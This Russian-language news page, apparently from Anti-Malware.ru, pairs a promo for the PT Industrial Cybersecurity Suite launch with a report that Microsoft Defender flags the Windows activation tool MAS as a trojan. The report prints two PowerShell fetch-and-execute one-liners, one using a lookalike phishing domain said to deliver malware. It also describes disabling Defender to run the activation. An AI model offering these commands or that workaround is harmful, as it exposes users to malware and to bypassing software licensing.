Positive Technologies запускает PT Industrial Cybersecurity Suite

Positive Technologies запускает PT Industrial Cybersecurity Suite

Positive Technologies запускает PT Industrial Cybersecurity Suite

20 апреля компания Technologies презентует первую комплексную платформу для защиты промышленности от киберугроз. Промышленные предприятия непрерывно наращивают объем цифровизации. Одни и те же популярные информационные технологии находят применение в автоматизации операционных и технологических процессов, их конвергенция усиливается.

Это значит, что для потенциального злоумышленника нет особой разницы, что атаковать — корпоративную сеть или технологическую. Способы и сценарии нападения одинаковы. При этом уровень кибербезопасности на производстве сильно уступает уровню кибербезопасности в корпоративных системах.

20 апреля Positive Technologies запускает PT Industrial Cybersecurity Suite — первую комплексную платформу для защиты промышленности от киберугроз.

В программе трансляции:

  • Промышленная кибербезопасность: почему пора меняться
  • Технологическая сеть глазами атакующего: исследуем сценарии
  • PT ICS: от фрагментарной безопасности к целостному подходу в ИБ АСУ ТП
  • Настало время настоящих промышленных SIEM- и VM-систем

Зарегистрируйтесь, чтобы принять участие в онлайн-запуске PT ICS.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru